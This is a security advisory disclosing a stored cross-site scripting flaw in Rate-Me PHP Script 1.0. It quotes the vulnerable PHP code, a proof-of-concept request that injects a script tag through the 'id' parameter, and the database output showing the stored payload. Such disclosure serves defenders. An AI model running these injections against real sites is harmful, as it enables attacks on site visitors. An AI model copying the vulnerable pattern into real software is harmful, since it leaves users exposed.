Rate-Me PHP Script 1.0 Cross Site Scripting

2016.11.15
Credit: Boumediene KADDOUR
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Rate-Me PHP Script Persistent Cross Site Scripting # Disclosure Date: 11/11/2016 # Exploit Author: Boumediene KADDOUR a.k.a Sh311c0d3r # Version: 1.0 # Application website: https://www.phpjabbers.com/free-rate-me-script/ # CVE : N/A Vulnerability Details: ===================== Rate-me php script suffers from a stored Cross Site Scripting which, An attacker can inject JavaScript in the rate section and in particular through the id field, where the injected script will be stored on the database. If a developer creates a webpage where authenticated or non authenticated users can see the rate status, The script's triggered and the code's executed on the client side. [+] PoC Vulnerable Code: if ($_REQUEST["do"]=='rate') { $sql = "INSERT INTO ".$SETTINGS["data_table"]." SET date_time=now(), rate_id='".mysql_real_escape_string($_REQUEST["id"])."', rating='".mysql_real_escape_string($_REQUEST["rating"])."', ip_address='".mysql_real_escape_string(get_client_ip())."'"; $sql_result = mysql_query ($sql, $connection ) or die ('request "Could not execute SQL query" '.$sql); echo 'Thank you'; exit; } Payload: GET /Rate-Me/rate-me.php?do=rate&id=<script>alert("StoredXSS")</script>&rating=1&1478894713054 HTTP/1.1 Host: 192.168.43.237 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.43.237/Rate-Me/example-page.html Connection: keep-alive Database output: mysql> select * from rateme where id=19; +----+-------------------------------------------------+---------+-----------------------------------------+------------------------+ | id | rate_id | rating | date_time | ip_address | +---- +------------------------------------------------+---------+------------------------------------------+-----------------------+ | 19 | <script>alert("StoredXSS")</script> | 1 | 2016-11-11 15:05:30 | 192.168.43.237 | +----+-------------------------------------------------+---------+------------+----------------------------+------------------------+ 1 row in set (0.00 sec) sh311c0d3r


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top